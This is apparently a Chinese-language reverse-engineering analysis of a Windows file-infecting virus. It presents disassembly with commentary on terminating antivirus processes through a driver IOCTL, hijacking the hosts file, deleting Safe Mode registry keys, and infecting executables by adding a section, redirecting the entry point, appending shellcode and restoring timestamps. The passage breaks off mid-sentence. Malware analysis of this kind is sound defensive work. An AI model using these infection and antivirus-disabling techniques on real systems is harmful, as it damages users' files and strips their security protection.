.text:0040528C mov [ebp+AntiVirsName], offset AntiVName ; 取第一个杀软名 .text:00405293 Next_2:

.text:00405293 mov eax, [ebp+AntiVirsName] .text:00405296 movsx eax, byte ptr [eax] .text:00405299 test eax, eax

.text:0040529B jz Over_2 ; 局部变量第一字节为0退出 .text:004052A1 and [ebp+var_8], 0 .text:004052A5 jmp short loc_4052AE

.text:004052A7 Next_1: ; CODE XREF: .text:004052A7 mov eax, [ebp+var_8] .text:004052AA inc eax

.text:004052AB mov [ebp+var_8], eax

.text:004052AE loc_4052AE: ; CODE XREF: .text:004052AE cmp [ebp+var_8], 4 .text:004052B2 jge short GoNext .text:004052B4 mov [ebp+var_C], 1 .text:004052BB and [ebp+InBuffer], 0

.text:004052BF and [ebp+BytesReturned], 0

.text:004052C3 push [ebp+AntiVirsName] ; 杀毒软件名称列表

.text:004052C6 call CheckProcess ; 检查上面这个进程是否存在 .text:004052CB mov [ebp+InBuffer], eax .text:004052CE cmp [ebp+InBuffer], 0

.text:004052D2 jnz short loc_4052D6 ; 存在向驱动发送IRP终止 .text:004052D4 jmp short GoNext ; 指定的进程名不存在，取下一个探测

.text:004052D6 loc_4052D6: ; CODE XREF: .text:004052D6 push 0 ; lpOverlapped .text:004052D8 lea eax, [ebp+BytesReturned]

.text:004052DB push eax ; lpBytesReturned .text:004052DC push 0 ; nOutBufferSize .text:004052DE push 0 ; lpOutBuffer .text:004052E0 push 4 ; nInBufferSize .text:004052E2 lea eax, [ebp+InBuffer]

.text:004052E5 push eax ; lpInBuffer

.text:004052E6 push 222264h ; dwIoControlCode .text:004052EB push [ebp+hDevice] ; hDevice

.text:004052EE call ds:DeviceIoControl ; 发送IRP吗终止杀毒软件 .text:004052F4 mov [ebp+var_C], eax .text:004052F7 cmp [ebp+var_C], 0

.text:004052FB jnz short SucessControl ; 关闭杀软成功，跳走 .text:004052FD jmp short GoNext

.text:004052FF SucessControl: ; CODE XREF:

.text:004052FF push 32h ; dwMilliseconds .text:00405301 call ds:Sleep

.text:00405307 jmp short Next_1

.text:00405309 GoNext: ; CODE XREF: .text:00405309 push 32h ; dwMilliseconds .text:0040530B call ds:Sleep

.text:00405311 push [ebp+AntiVirsName] ; lpString .text:00405314 call ds:lstrlenA

.text:0040531A mov ecx, [ebp+AntiVirsName] .text:0040531D lea eax, [ecx+eax+1]

.text:00405321 mov [ebp+AntiVirsName], eax ; 取下一个杀软名 .text:00405324 jmp Next_2

劫持drivers\\\\etc\\\\hosts，屏蔽一系列网址

.text:004066DE mov [ebp+lpBuffer], offset a127_0_0_1Local ; \ localhost\\r\\n\

.text:004066E5 and [ebp+NumberOfBytesWritten], 0 .text:004066E9 or [ebp+hObject], 0FFFFFFFFh .text:004066ED push 104h ; size_t .text:004066F2 push 0 ; int .text:004066F4 lea eax, [ebp+FileName]

.text:004066FA push eax ; void * .text:004066FB call memset .text:00406700 add esp, 0Ch

.text:00406703 push offset SystemDirector

.text:00406708 push offset aSDriversEtcHos ; \.text:0040670D lea eax, [ebp+FileName]

.text:00406713 push eax ; LPSTR .text:00406714 call ds:wsprintfA .text:0040671A add esp, 0Ch

.text:0040671D push 0 ; hTemplateFile

.text:0040671F push 80h ; dwFlagsAndAttributes .text:00406724 push 3 ; dwCreationDisposition .text:00406726 push 0 ; lpSecurityAttributes .text:00406728 push 3 ; dwShareMode .text:0040672A push 0C0000000h ; dwDesiredAccess .text:0040672F lea eax, [ebp+FileName]

.text:00406735 push eax ; lpFileName .text:00406736 call ds:CreateFileA

.text:0040673C mov [ebp+hObject], eax

.text:0040673F push 0 ; lpOverlapped .text:00406741 lea eax, [ebp+NumberOfBytesWritten]

.text:00406744 push eax ; lpNumberOfBytesWritten .text:00406745 push [ebp+lpBuffer] ; lpString .text:00406748 call ds:lstrlenA

.text:0040674E push eax ; nNumberOfBytesToWrite .text:0040674F push [ebp+lpBuffer] ; lpBuffer .text:00406752 push [ebp+hObject] ; hFile

.text:00406755 call ds:WriteFile ; 写入\ localhost\\r\\n\

删除注册表破坏安全模式

.text:00406963 push offset pszSubKey ; \

.text:00406968 push 80000002h ; hkey .text:0040696D call ds:SHDeleteKeyA

.text:00406973 push offset aSystemCurren_0

; \

.text:00406978 push 80000002h ; hkey

.text:0040697D call ds:SHDeleteKeyA ; 删除注册表破坏安全模式

接下来是感染文件，首先判断\是否存在

.text:0040634A push offset aCProgramFilesW ; \Files\\\\WinRAR\\\\Rar.exe\

.text:0040634F push offset pszPath ; lpString1 .text:00406354 call ds:lstrcpyA

.text:0040635A push offset pszPath ; pszPath .text:0040635F call ds:PathFileExistsA .text:00406365 mov CRar_exe, eax

然后获取磁盘类型，避免无效分区和光驱，如果遇到无效和光驱则再次跳回接着感染。 .text:004063C3 push [ebp+lpString] ; lpRootPathName .text:004063C6 call ds:GetDriveTypeA ; 获取磁盘类型 .text:004063CC mov [ebp+DriveType], eax

.text:004063CF cmp [ebp+DriveType], 1 ; 无效分区DRIVE_NO_ROOT_DIR

.text:004063D3 jbe short Next_2

.text:004063D5 cmp [ebp+DriveType], 5

.text:004063D9 jz short Next_2 ; 当是光驱的时候跳走

如果磁盘是正常则开辟线程感染文件

.text:004063DB push 0 .text:004063DD push 0

.text:004063DF mov eax, [ebp+lpString]

.text:004063E2 push dword ptr [eax] ;文件路径做为参数 .text:004063E4 push offset TaintFile_1 ; 创建线程感染文件 .text:004063E9 push 0 .text:004063EB push 0

.text:004063ED call [ebp+CreateThread]

感染文件之前还要检查路径，排除系统文件被感染，跳过WinRAR，WindowsUpdate，Windows NT，Windows Media Player，Outlook Express，NetMeeting，MSN Gaming Zone，Movie Maker microsoft frontpage，Messenger，Internet Explorer，InstallShield Installation Information ComPlus Applications，Common Files，RECYCLER，System Volume Information Documents and Settings，WinNT，WINDOWS，实现方法如下： .text:00406220 NextSysFlod:

.text:00406220 mov eax, [ebp+var_35C] .text:00406226 inc eax

.text:00406227 mov [ebp+var_35C], eax .text:0040622D loc_40622D:

.text:0040622D cmp [ebp+var_35C], 15h

.text:00406234 jge short loc_40625A .text:00406236 mov eax, [ebp+var_35C]

.text:0040623C push lpString2[eax*4] ; lpString2 .text:00406243 push [ebp+lpString1] ; lpString1

.text:00406249 call ds:lstrcmpiA ; 与指定的系统目录做比较 .text:0040624F test eax, eax

.text:00406251 jnz short Next_1

.text:00406253 jmp GoOutReturn ; 避免感染系统目录内的文件 .text:00406253 ; 找到系统目录后退出 .text:00406258 Next_1:

.text:00406258 jmp short NextSysFlod

下面通过FindFirstFile和FindNextFile搜寻文件，找到后调用感染函数感染之。

下面是感染exe文件的主要过程，首先创建文件映射，在创建文件映射后修改节区数，映射内存长度，入口点地址，还有新增一个名为.tc的节区，之后定位到文件末尾，在文件末尾写入shell代码以及原OEP。

构造一个新节区：

.text:0040727B mov eax, [ebp+EndOfLastTriv] .text:00407281 mov [ebp+var_50], eax

.text:00407284 mov [ebp+var_40], 0E0000020h ; 节区属性 .text:0040728B mov ax, word ptr byte_40BE6C .text:00407291 mov [ebp+var_42], ax

.text:00407295 push 28h ; size_t .text:00407297 lea eax, [ebp+ct.]

.text:0040729A push eax ; void * .text:0040729B mov eax, [ebp+NTAddress] .text:004072A1 add eax, [ebp+NTSecLen]

.text:004072A4 push eax ; void *

.text:004072A5 call memcpy ; 构造新节头 .text:004072AA add esp, 0Ch

.text:004072AD mov eax, [ebp+NTAddress] .text:004072B3 movzx eax, word ptr [eax+6]

.text:004072B7 inc eax ; 节头数加1 .text:004072B8 mov ecx, [ebp+NTAddress] .text:004072BE mov [ecx+6], ax

.text:004072C2 mov eax, [ebp+NTAddress] .text:004072C8 cmp dword ptr [eax+1Ch], 0

.text:004072CC jz short WriteShellCode ; 跳走写shell代码

.text:004072E3 mov eax, [ebp+NTAddress] ; 定位到NT头的地址 .text:004072E9 mov ecx, [ebp+EndOfShellCode]

.text:004072EC mov [eax+28h], ecx ; 修改入口点地址 .text:004072EF mov eax, [ebp+NTAddress]

.text:004072F5 mov eax, [eax+50h] .text:004072F8 add eax, [ebp+var_5C] .text:004072FB mov ecx, [ebp+NTAddress]

.text:00407301 mov [ecx+50h], eax ; 修改导入表的地址 .text:00407304 push [ebp+lpBaseAddress] ; lpBaseAddress .text:00407307 call ds:UnmapViewOfFile

.text:0040731E push 2 ; dwMoveMethod

.text:00407320 push 0 ; lpDistanceToMoveHigh .text:00407322 .text:00407328 .text:0040732B .text:0040732C .text:0040732F .text:00407335 .text:00407338 .text:0040733E .text:00407340 .text:00407342 .text:00407344 .text:00407347 .text:00407348 .text:0040734B .text:00407351 .text:00407353 .text:00407356 .text:00407357 .text:0040735C .text:00407361 .text:00407364 .text:0040736A .text:0040736C .text:0040736F .text:00407370 ; nNumberOfBytesToWrite

.text:00407376 .text:0040737C .text:0040737F .text:00407385 .text:00407387 .text:00407389 .text:0040738B .text:00407391 .text:00407394 mov eax, [ebp+SplcaeEnd] add eax, [ebp+var_54]

push eax ; lDistanceToMove push [ebp+hFile] ; hFile call ds:SetFilePointer

push [ebp+hFile] ; hFile call ds:SetEndOfFile

push 2 ; dwMoveMethod

push 0 ; lpDistanceToMoveHigh xor eax, eax

sub eax, [ebp+var_54]

push eax ; lDistanceToMove push [ebp+hFile] ; hFile

call ds:SetFilePointer ; 定位到文件结尾 push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesWritten]

push eax ; lpNumberOfBytesWritten push 297h ; nNumberOfBytesToWrite push offset loc_409BA8 ; lpBuffer push [ebp+hFile] ; hFile

call ds:WriteFile ; 写入感染exe的代码 push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesWritten]

push eax ; lpNumberOfBytesWritten push nNumberOfBytesToWrite push lpBuffer ; lpBuffer push [ebp+hFile] ; hFile call ds:WriteFile

push 1 ; dwMoveMethod

push 0 ; lpDistanceToMoveHigh xor eax, eax

sub eax, nNumberOfBytesToWrite sub eax, 2Bh

push eax ; lDistanceToMove

.text:00407395 push [ebp+hFile] ; hFile .text:00407398 call ds:SetFilePointer

.text:0040739E push 0 ; lpOverlapped .text:004073A0 lea eax, [ebp+NumberOfBytesWritten]

.text:004073A3 push eax ; lpNumberOfBytesWritten .text:004073A4 push 4 ; nNumberOfBytesToWrite .text:004073A6 push offset nNumberOfBytesToWrite ; lpBuffer .text:004073AB push [ebp+hFile] ; hFile .text:004073AE call ds:WriteFile

.text:004073B4 mov eax, [ebp+EndOfShellCode] .text:004073B7 add eax, 297h

.text:004073BC mov ecx, [ebp+OEP] ; 保存OEP .text:004073C2 sub ecx, eax

.text:004073C4 mov [ebp+Buffer], ecx ; 重定位OEP

.text:004073C7 push 2 ; dwMoveMethod

.text:004073C9 push 0 ; lpDistanceToMoveHigh .text:004073CB xor eax, eax

.text:004073CD sub eax, [ebp+var_54]

.text:004073D0 push eax ; lDistanceToMove .text:004073D1 push [ebp+hFile] ; hFile .text:004073D4 call ds:SetFilePointer

.text:004073DA push 1 ; dwMoveMethod

.text:004073DC push 0 ; lpDistanceToMoveHigh .text:004073DE push 293h ; lDistanceToMove .text:004073E3 push [ebp+hFile] ; hFile .text:004073E6 call ds:SetFilePointer

.text:004073EC push 0 ; lpOverlapped .text:004073EE lea eax, [ebp+NumberOfBytesWritten]

.text:004073F1 push eax ; lpNumberOfBytesWritten .text:004073F2 push 4 ; nNumberOfBytesToWrite .text:004073F4 lea eax, [ebp+Buffer]

.text:004073F7 push eax ; lpBuffer .text:004073F8 push [ebp+hFile] ; hFile

.text:004073FB call ds:WriteFile ; 将OEP写入被感染的exe文件 .text:00407401 push 1 ; int .text:00407403 lea eax, [ebp+CreationTime]

.text:00407409 push eax ; lpCreationTime .text:0040740A push [ebp+hFile] ; hFile

.text:0040740D call FileOldTime ; 将被感染的文件的时间设置成之前的时间

对于html和htm，asp，apsl格式文件则在该文件末尾写上一串